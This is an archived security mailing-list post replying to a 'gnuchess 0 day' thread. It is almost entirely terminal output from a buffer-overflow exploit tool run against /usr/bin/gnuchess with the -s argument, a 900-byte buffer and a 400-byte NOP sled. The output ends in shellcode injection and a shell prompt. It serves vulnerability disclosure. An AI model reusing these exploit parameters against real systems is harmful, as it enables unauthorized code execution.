lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: chris at cr-secure.net (Chris) Subject: re: gnuchess 0 day hey what do ya know it works :-/ (slack 9.1) chris@...alhost:/HDB/mycode/ex$ ./ex_bof Please enter the values as requested . . . Enter the vulnerable program path: /usr/bin/gnuchess Enter the vulnerable program name: gnuchess Enter any arguments the program requires: -s Enter an offset: 0 Enter a buffer size: 900 Enter the nop sled size: 400 The Return Value Is: 0xbffff898 Injecting Shellcode . . . sh-2.05b$ www.cr-secure.net